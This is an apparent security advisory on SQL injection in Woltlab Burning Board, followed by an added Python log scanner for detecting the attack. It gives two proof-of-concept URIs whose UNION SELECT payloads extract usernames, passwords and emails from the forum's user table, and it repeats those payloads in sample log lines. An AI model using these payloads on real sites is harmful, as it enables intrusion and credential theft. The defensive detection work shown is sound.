Woltlab Burning Board Multiple SQL Injection Vulnerabilities

These issues can be exploited through use of a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[WBBDir]/info_db.php?action=file&subkatid=1&noheader=1&fileid=1/**/UNION/**/SELECT/**/0,0,0,username,password,0,0,0,0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1

http://www.example.com/[WBBDir]/database.php?action=file&subkatid=1&noheader=1&fileid=1/**/UNION/**/SELECT/**/0,0,0,username,password,0,0,0,0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1
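
For defenders reviewing web server logs, the following added example (not part of the original advisory) flags requests to the two scripts named above whose ID parameters are not plain integers. It assumes that `fileid` and `subkatid` are meant to be integer IDs and that logs use the combined access-log format; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script names and parameters come from the proof-of-concept URIs above.
WATCHED_SCRIPTS = ("info_db.php", "database.php")
# Assumption: these parameters should only ever carry decimal integer IDs.
NUMERIC_PARAMS = ("fileid", "subkatid")

# Client address and request target from a combined-format access log line.
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(uri):
    """Return {param: decoded value} for watched parameters that are not integers."""
    parts = urlsplit(uri)
    if not parts.path.endswith(WATCHED_SCRIPTS):
        return {}
    # parse_qs percent-decodes, so encoded payloads are checked in decoded form.
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = {}
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if not re.fullmatch(r"[0-9]+", value):
                hits[name] = value
    return hits

def scan_log(lines):
    """Return (client, uri, hits) for every request with a non-integer ID."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            hits = suspicious_params(m.group(2))
            if hits:
                findings.append((m.group(1), m.group(2), hits))
    return findings

# Constructed sample log lines (documentation addresses, made-up paths).
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2010:10:00:00 +0000] "GET /wbb/info_db.php?action=file&subkatid=1&fileid=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2010:10:00:05 +0000] "GET /wbb/info_db.php?action=file&subkatid=1&noheader=1&fileid=1/**/UNION/**/SELECT/**/0,0 HTTP/1.1" 200 734',
    '203.0.113.7 - - [01/Jan/2010:10:00:09 +0000] "GET /wbb/database.php?action=file&fileid=1%2F%2A%2A%2FUNION HTTP/1.1" 200 734',
    '198.51.100.4 - - [01/Jan/2010:10:01:00 +0000] "GET /wbb/index.php?fileid=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, uri, hits in scan_log(SAMPLE_LOG):
        print(client, uri, hits)
```

The same integer-only check, applied server-side before the value reaches a query, is the corresponding input-validation control.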


 
